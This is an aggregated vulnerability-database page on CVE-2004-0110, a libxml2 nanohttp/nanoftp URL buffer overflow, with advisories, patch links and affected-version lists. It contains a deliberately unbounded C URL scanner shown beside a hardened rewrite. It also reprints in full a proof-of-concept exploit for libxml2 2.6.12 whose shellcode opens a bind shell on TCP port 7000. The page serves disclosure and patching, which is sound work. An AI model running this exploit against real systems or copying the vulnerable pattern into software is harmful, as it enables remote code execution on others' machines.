CVE-2004-0110
CVSS 7.5
Published: 2004-03-15 00:00:00
Revised: 2016-10-17 22:40:57

[Original] Buffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allows remote attackers to execute arbitrary code via a long URL.


[CNNVD] Libxml2 remote URI parsing buffer overflow vulnerability (CNNVD-200403-056)

        
        libxml2 is a library for processing XML documents.
        libxml2 does not correctly handle overly long URLs. A remote attacker can exploit this to cause a buffer overflow in libxml2; a carefully constructed URI may allow arbitrary code to run with the privileges of the process that calls libxml2.
        When fetching a remote resource over FTP or HTTP, libxml2 uses its own minimal URL-scanning routines in the nanoftp and nanohttp modules. These routines copy URL components into a fixed-size buffer without bounding the length, so an overly long URL overflows the buffer, and an attacker who can supply a specially crafted URI may execute arbitrary code with the privileges of the process using the library.
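The following C program is an added illustration, not code from libxml2 or from any of the advisories on this page. It shows the scanning pattern behind this class of bug, a URL component copied into a fixed 4096-byte stack buffer with no bound on the index, beside a bounded rewrite that checks every copy against the destination's capacity and rejects overlong input instead of writing past the end. The 4096-byte size follows the figure reported elsewhere on this page; the function names, the struct layout and the constructed test URLs are assumptions made for this example and are not libxml2 identifiers.

```c
/* Added illustration, not libxml2 code: a URL scanner in the style that
 * overflowed in nanohttp/nanoftp, beside a bounded rewrite. URLBUF = 4096
 * follows the size reported on this page; the function names, struct and
 * constructed test URLs are assumptions made for this example. */
#include <stdlib.h>
#include <string.h>

#define URLBUF 4096                 /* fixed on-stack scratch buffer */

/* VULNERABLE PATTERN: scheme characters are copied into a fixed buffer
 * until "://" is seen; nothing stops indx from running past URLBUF, so a
 * URL whose scheme part exceeds 4096 bytes smashes the stack. Kept for
 * comparison only; never feed it untrusted input. scheme_out >= URLBUF. */
static int scan_scheme_unbounded(const char *url, char *scheme_out)
{
    char buf[URLBUF];
    int indx = 0;

    for (; *url != '\0'; url++) {
        if (url[0] == ':' && url[1] == '/' && url[2] == '/') {
            buf[indx] = '\0';
            strcpy(scheme_out, buf);
            return 0;
        }
        buf[indx++] = *url;         /* no check that indx < URLBUF */
    }
    return -1;
}

struct url_parts {                  /* each part in a buffer of known size */
    char scheme[16];
    char host[256];                 /* longest legal DNS name */
    int  port;                      /* 0 when the URL carries no port */
    char path[URLBUF];
};

/* Copy [start,end) into dst of capacity cap; fail instead of truncating. */
static int copy_bounded(char *dst, size_t cap, const char *start, const char *end)
{
    size_t n = (size_t)(end - start);
    if (n >= cap)
        return -1;
    memcpy(dst, start, n);
    dst[n] = '\0';
    return 0;
}

/* HARDENED: total length capped up front, every copy checked against its
 * destination, port parsed digit by digit with a range check, and anything
 * that does not fit rejected (-1) rather than written. */
int scan_url_bounded(const char *url, struct url_parts *out)
{
    const char *cur, *sep, *host_end;

    memset(out, 0, sizeof *out);
    if (strlen(url) > URLBUF || (sep = strstr(url, "://")) == NULL)
        return -1;
    if (copy_bounded(out->scheme, sizeof out->scheme, url, sep) != 0)
        return -1;
    cur = sep + 3;
    host_end = cur + strcspn(cur, ":/");   /* host ends at port, path or NUL */
    if (host_end == cur || copy_bounded(out->host, sizeof out->host, cur, host_end) != 0)
        return -1;
    cur = host_end;
    if (*cur == ':') {
        long p = 0;
        int ndigits = 0;
        for (cur++; *cur >= '0' && *cur <= '9'; cur++, ndigits++)
            if ((p = p * 10 + (*cur - '0')) > 65535)
                return -1;
        if (ndigits == 0 || p == 0 || (*cur != '\0' && *cur != '/'))
            return -1;
        out->port = (int)p;
    }
    if (*cur == '\0')
        strcpy(out->path, "/");
    else if (copy_bounded(out->path, sizeof out->path, cur, cur + strlen(cur)) != 0)
        return -1;
    return 0;
}

/* Constructed attack-style URL: prefix, host_len bytes of 'A', then "/".
 * Caller frees the result. */
char *make_long_url(const char *prefix, size_t host_len)
{
    size_t plen = strlen(prefix);
    char *u = malloc(plen + host_len + 2);
    if (u == NULL)
        return NULL;
    memcpy(u, prefix, plen);
    memset(u + plen, 'A', host_len);
    u[plen + host_len] = '/';
    u[plen + host_len + 1] = '\0';
    return u;
}
```

The design point is that the bounded version never trusts the input length to fit a destination: the caller passes each buffer's capacity, copy_bounded refuses rather than truncates, and a URL of 5000 bytes (make_long_url with host_len 5000) is turned away at the top of scan_url_bounded, whereas the same input would have driven indx past the 4096-byte buffer in scan_scheme_unbounded.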
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:sgi:propack:2.3           SGI ProPack 2.3
cpe:/a:xmlsoft:libxml2:2.5.11    XMLSoft Libxml2 2.5.11
cpe:/a:xmlsoft:libxml2:2.6.5     XMLSoft Libxml2 2.6.5
cpe:/a:xmlsoft:libxml2:2.6.4     XMLSoft Libxml2 2.6.4
cpe:/a:xmlsoft:libxml2:2.4.23    XMLSoft Libxml2 2.4.23
cpe:/a:xmlsoft:libxml2:2.5.10    XMLSoft Libxml2 2.5.10
cpe:/a:xmlsoft:libxml2:2.4.19    XMLSoft Libxml2 2.4.19
cpe:/a:xmlsoft:libxml2:2.6.1     XMLSoft Libxml2 2.6.1
cpe:/a:xmlsoft:libxml2:2.6.0     XMLSoft Libxml2 2.6.0
cpe:/a:xmlsoft:libxml2:2.5.4     XMLSoft Libxml2 2.5.4
cpe:/a:xmlsoft:libxml2:2.6.3     XMLSoft Libxml2 2.6.3
cpe:/a:xmlsoft:libxml2:2.6.2     XMLSoft Libxml2 2.6.2
cpe:/a:sgi:propack:2.4           SGI ProPack 2.4
cpe:/a:xmlsoft:libxml:1.8.17     XMLSoft Libxml 1.8.17

- OVAL (technical details for detection)

oval:org.mitre.oval:def:875      XMLSoft Libxml2 Code Execution Vulnerability
oval:org.mitre.oval:def:833      XMLSoft Libxml2 Code Execution Vulnerability
oval:org.mitre.oval:def:11626    Buffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allow remote attackers to execu...
*The OVAL definitions describe in detail how to detect this vulnerability; see the related OVAL definitions for further technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0110
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0110
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-056
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107851606605420&w=2
(UNKNOWN)  BUGTRAQ  20040305 [OpenPKG-SA-2004.003] OpenPKG Security Advisory (libxml)
http://marc.info/?l=bugtraq&m=107860178228804&w=2
(UNKNOWN)  BUGTRAQ  20040306 TSLSA-2004-0010 - libxml2
http://rhn.redhat.com/errata/RHSA-2004-090.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:090
http://security.gentoo.org/glsa/glsa-200403-01.xml
(UNKNOWN)  GENTOO  GLSA-200403-01
http://www.ciac.org/ciac/bulletins/o-086.shtml
(UNKNOWN)  CIAC  O-086
http://www.debian.org/security/2004/dsa-455
(UNKNOWN)  DEBIAN  DSA-455
http://www.kb.cert.org/vuls/id/493966
(UNKNOWN)  CERT-VN  VU#493966
http://www.novell.com/linux/security/advisories/2005_01_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:001
http://www.redhat.com/support/errata/RHSA-2004-091.html
(UNKNOWN)  REDHAT  RHSA-2004:091
http://www.redhat.com/support/errata/RHSA-2004-650.html
(UNKNOWN)  REDHAT  RHSA-2004:650
http://www.securityfocus.com/bid/9718
(VENDOR_ADVISORY)  BID  9718
http://www.xmlsoft.org/news.html
(UNKNOWN)  CONFIRM  http://www.xmlsoft.org/news.html
http://xforce.iss.net/xforce/xfdb/15301
(VENDOR_ADVISORY)  XF  libxml2-nanohttp-bo(15301)
http://xforce.iss.net/xforce/xfdb/15302
(UNKNOWN)  XF  libxml2-nanoftp-bo(15302)

- Vulnerability information

Libxml2 remote URI parsing buffer overflow vulnerability
High risk    Boundary condition error
Published: 2004-03-15 00:00:00    Updated: 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        RedHat
        ------
        RedHat has released a security advisory (RHSA-2004:091-01) and corresponding patches:
        RHSA-2004:091-01: Updated libxml2 packages fix security vulnerability
        Link: https://www.redhat.com/support/errata/RHSA-2004-091.html
        Patch downloads:
        Red Hat Linux 9:
        SRPMS:
        ftp://updates.redhat.com/9/en/os/SRPMS/libxml2-2.5.4-2.src.rpm
        i386:
        ftp://updates.redhat.com/9/en/os/i386/libxml2-2.5.4-2.i386.rpm
        ftp://updates.redhat.com/9/en/os/i386/libxml2-devel-2.5.4-2.i386.rpm
        ftp://updates.redhat.com/9/en/os/i386/libxml2-python-2.5.4-2.i386.rpm
        XMLSoft
        -------
        The vendor has released an upgrade that fixes this issue; download it from the vendor's site:
        XMLSoft Upgrade Libxml 2.6.6
        ftp://xmlsoft.org/

- Vulnerability information (601)

libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit (EDBID:601)
Platform: linux    Type: local
2004-10-26    Verified
Port: 0    Author: infamous41md
N/A
Note: this proof of concept targets libxml2 2.6.12, a release later than 2.6.6, which this page lists as the fix for CVE-2004-0110. The string it builds ("://[" followed by the payload) drives xmlNanoFTPScanURL down its bracketed-IPv6 host path, the separate nanoftp/nanohttp overflow reported later in 2004 (CVE-2004-0989), so it does not exercise the 2.6.0 through 2.6.5 bug described above.
/*
 *  libxml 2.6.12 nanoftp bof POC   infamous42mdAThotpopDOTcom
 *
 *  [n00b localho outernet] gcc -Wall libsuxml.c -lxml2
 *  [n00b localho outernet] ./a.out 
 *  Usage: ./a.out <retaddr> [ align ]
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  [n00b localho outernet] ./a.out 0xbfff0360
 *  xmlNanoFTPScanURL: Use [IPv6]/IPv4 format
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN   
 *
 */
/* Build note: libxml2 headers normally live under /usr/include/libxml2, so
 * the include path from `xml2-config --cflags` is usually needed as well. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <libxml/nanoftp.h>

#define die(x) do{ perror((x)); exit(1); }while(0)
#define BS 0x10000      /* 64 KiB payload buffer */
#define NOP 0x90        /* x86 NOP, used for the sled */
#define NNOPS 3000      /* length of the NOP sled */
#define ALIGN 0         /* default padding before the return-address block */

/* Linux/x86 bind shell: listens on TCP port 7000 (0x1b58), dup2s the
 * accepted socket onto stdin/stdout/stderr and execs /bin//sh */
#define SHELL_LEN (sizeof(sc)-1)
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * Payload layout handed to xmlNanoFTPNewCtxt():
 *   "://["  +  NOP sled  +  shellcode  +  [align]  +  ~2000 bytes of retaddr  +  "]"
 * The leading "[" sends xmlNanoFTPScanURL down its bracketed-IPv6 host
 * path, which is the code this PoC overflows.
 */
int main(int argc, char **argv)
{
    int x = 0, len = 0;
    char    buf[BS] = {'A',};          /* buf[0] = 'A', remainder zero-filled */
    long    retaddr = 0, align = ALIGN;

    if(argc < 2){
        fprintf(stderr, "Usage: %s <retaddr> [ align ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(sscanf(argv[1], "%lx", &retaddr) != 1)   /* return address in hex, e.g. 0xbfff0360 */
        die("sscanf");
    if(argc > 2)
        align = atoi(argv[2]);
    if(align < 0 || align > 3)
        die("nice try newblar");

    strncpy(buf, "://[", 4);
    len += 4;
    memset(buf+len, NOP, NNOPS);
    len += NNOPS;
    memcpy(buf+len, sc, SHELL_LEN);
    len += SHELL_LEN;
    
    len += align;
    /* repeat retaddr for ~2000 bytes so the saved return address is overwritten */
    for(x = 0; x < (int)(2000 - (sizeof(retaddr) - 1)); x += sizeof(retaddr))
        memcpy(buf+len+x, &retaddr, sizeof(retaddr));
    buf[len+x] = ']';
    buf[len+x+1] = 0;

    xmlNanoFTPNewCtxt(buf);     /* parses the URL; the overflow happens inside */

    return EXIT_SUCCESS;
}

// milw0rm.com [2004-10-26]

- Vulnerability information

4032
Libxml2 nanohttp.c URI Parsing Overflow
Location: Remote / Network Access    Attack type: Input Manipulation
Impact: Loss of Integrity    Solution: Upgrade
Exploit: Unknown    Disclosure: Vendor Verified

- Description

A remote overflow exists in Libxml2. The nanohttp module fails to perform proper bounds checking when parsing a URI, resulting in a buffer overflow. With a specially crafted, overly long URI, reportedly about 4096 bytes, an attacker can potentially execute arbitrary code, resulting in possible unauthorized remote access.

- Timeline

2004-02-12 Unknown
Unknown 2004-02-12

- Solution

It has been reported that this issue has been fixed. Upgrade to version 2.6.6, or higher, to address this vulnerability.


- Vulnerability information

libxml2 Remote URI Parsing Buffer Overrun Vulnerability
Class: Boundary Condition Error    Bugtraq ID: 9718
Remote: Yes    Local: No
Published: 2004-02-12 12:00:00    Updated: 2009-08-21 03:54:00
Discovery of this issue is credited to Yuuichi Teranishi.

- Affected versions

XMLSoft Libxml2 2.6.5
XMLSoft Libxml2 2.6.4
XMLSoft Libxml2 2.6.3
XMLSoft Libxml2 2.6.2
XMLSoft Libxml2 2.6.1
XMLSoft Libxml2 2.6.0
XMLSoft Libxml2 2.5.11
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
XMLSoft Libxml2 2.5.10
+ Trustix Secure Linux 2.0
XMLSoft Libxml2 2.5.8
XMLSoft Libxml2 2.5.4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
XMLSoft Libxml2 2.5.1
+ Conectiva Linux 9.0
XMLSoft Libxml2 2.4.23
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
XMLSoft Libxml2 2.4.19
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
XMLSoft Libxml2 2.4.12
+ Conectiva Linux 8.0
XMLSoft Libxml 1.8.17
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Appliance Server Hosting Edition 1.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SuSE SUSE Linux Enterprise Server 7
+ Linux kernel 2.4.19
SGI ProPack 3.0
SGI ProPack 2.4
SGI ProPack 2.3
SGI Advanced Linux Environment 3.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
RedHat Linux 7.3 i686
RedHat Linux 7.3 i386
RedHat Linux 7.3
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora 11
Red Hat Fedora 10
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Apple Mac OS X Server 10.3.3
Apple Mac OS X 10.3.3

- Unaffected versions

XMLSoft Libxml2 2.6.6

- Discussion

A remotely exploitable buffer-overrun vulnerability has been reported in libxml2. This issue is caused by insufficient bounds checking in the URI parsing code in the 'nanohttp' and 'nanoftp' modules.

Attackers may exploit this issue to execute arbitrary code.

- Exploit

Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

This issue has been addressed in libxml2 2.6.6.

XMLSoft Libxml 1.8.17
Turbolinux Turbolinux Desktop 10.0
Apple Mac OS X 10.3.3
Apple Mac OS X Server 10.3.3
SGI ProPack 2.3
SGI ProPack 2.4
XMLSoft Libxml2 2.4.12
XMLSoft Libxml2 2.4.19
XMLSoft Libxml2 2.4.23
XMLSoft Libxml2 2.5.1
XMLSoft Libxml2 2.5.10
XMLSoft Libxml2 2.5.11
XMLSoft Libxml2 2.5.4
XMLSoft Libxml2 2.5.8
XMLSoft Libxml2 2.6.0
XMLSoft Libxml2 2.6.1
XMLSoft Libxml2 2.6.2
XMLSoft Libxml2 2.6.3
XMLSoft Libxml2 2.6.4
XMLSoft Libxml2 2.6.5
SGI ProPack 3.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Server 8.0
